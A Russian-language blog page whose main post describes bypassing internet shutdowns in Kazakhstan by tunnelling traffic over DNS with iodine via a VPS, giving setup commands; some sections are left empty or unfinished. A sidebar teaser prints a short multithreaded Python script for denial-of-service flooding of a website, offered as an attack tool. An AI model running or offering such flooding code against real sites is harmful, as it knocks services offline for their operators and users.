Обход блокировок сайтов через DNS (iodine)

-

Во время блокировок интернета в Казахстане мне очень хотелось посидеть в интернете. И я решил найти способы обхода. Я попробовал использовать tor мосты, прокси, итд. Но ничего не помогало, тк весь трафик домашнего интернета кроме как на казахстанские сайты блокировался. Тогда я решил немного поиграться с трафиком. Я попробовал пустить запрос на DNS сервер из домашнего интернета, но ничего не вышло. Но тогда я решил попробовать купить себе VPS сервер одного из казахстанских провайдеров. И оказалось что у них успешно проходит DNS трафик на любой сервер. Видимо для VPS провайдеров сделали не такие жесткие правила для фильтрации трафика. Поэтому, если у нас есть VPS сервер вне Казахстана, и на котором есть DNS сервер, то мы можем настроить его для работы в роли прокси сервера.

DNS сервер reg.ru во время блокировок из домашнего интернета

Тот-же DNS сервер, но из казахской VPS  

Протестировать этот способ обхода блокировок во время отключения интернета я не смог, тк не мог скачать нужный софт из интернета тк он был недоступен. Поэтому, сейчас я решил создать себе этот прокси к которому я в любой момент могу подключится во время таких вот блокировок интернета.

Как установить iodine и настроить

Установка проста, в большинстве linux дистрибутивов iodine можно установить из стандартного пакетного менеджера. Например в Ubuntu apt install iodine.

Для работы iodine нужен собственный домен, в котором можно настроить DNS записи. Я использовал namecheap:


Под пивом я 

iodine -f -P fakk  t1.mkhitaryan.pw

/usr/sbin/iodined -P fakk -c 192.168.99.1 t1.mkhitaryan.pw

Нужно проверить чтобы -c IP не пересекался с другими в вашей сети vps. Проверить можно через ip route show. Например у моего VPS сервера был 


Из-за этого перебивался роутинг и TUN устройство ломало мне интернет.

Комментарии

Отправить комментарий

Популярные сообщения из этого блога

DOS атака при помощи Python

-
Изображение
Для атак вида "DOS" используют один мощный сервер который посылает жертве столько запросов, что жертва не успевает обработать их и выдаёт ошибку 503 либо 504. Для атаки нужна многопоточность, то есть нужно чтобы скрипт отправлял запрос не ожидая завершения предыдущего. В Python для этого есть библиотека "therading". Пример простейшего скрипта для доса: # coding: utf8 import threading import requests def dos (): while True : requests . get( "http://example.com" ) while True : threading . Thread(target = dos) . start() Скрипт рекомендую запускать только на мощных компьютерах а ещё лучше на VPS сервере. Вот наш скрипт в действии: Так же советую попробовать новый ддос скрипт который использует вместо потоков асинхронный код
Далее...

Как компилировать встроенные приложения gnome

-
Изображение
В официальной документации gnome  говорится что для сборок используется система сборок - BuildStream. В этом туториале я буду использовать его через докер  docs.buildstream.build/1.6.1/install_docker.html . Для начала нужно установить докер. Сделать это можно одной командой: curl -fsSL https://get.docker.com | sh BuildStream создали утилиту для запуска через докер - bst-here . Он запускает докер контейнер BuildStream с всеми нужными предустановленными программами, что позволяет не засорять основную систему. Для установки нужно скачать скрипт и добавить его в директорию исполняемых файлов: mkdir -p ~/.local/bin curl --get https://gitlab.com/BuildStream/buildstream/raw/master/contrib/bst-here > ~/.local/bin/bst-here chmod +x ~/.local/bin/bst-here Чтобы убедится в правильности установки нужно просто запустить команду bst-here. Должен появится терминал на подобии этого: Для настройки buildstream.conf нужно создать файл на хост машине /root/.config/buildstream.conf. # This confi...
Далее...

TypeError: __init__() got an unexpected keyword argument 'decode'

-
This error is from aiortc's webcam example application. The core of this problem is that the pypi version is old, and git version is using new interface that is not available from pypi. So you need to install aiortc from git. If you just do pip install git+https://github.com/aiortc/aiortc.git and get this error:   build/temp.linux-x86_64-cpython-39/aiortc.codecs._opus.c:570:10: fatal error: opus/opus.h: No such file or directory     570 | #include <opus/opus.h>         |          ^~~~~~~~~~~~~   compilation terminated.   error: command '/usr/bin/x86_64-linux-gnu-gcc' failed with exit code 1   ----------------------------------------   ERROR: Failed building wheel for aiortc
Далее...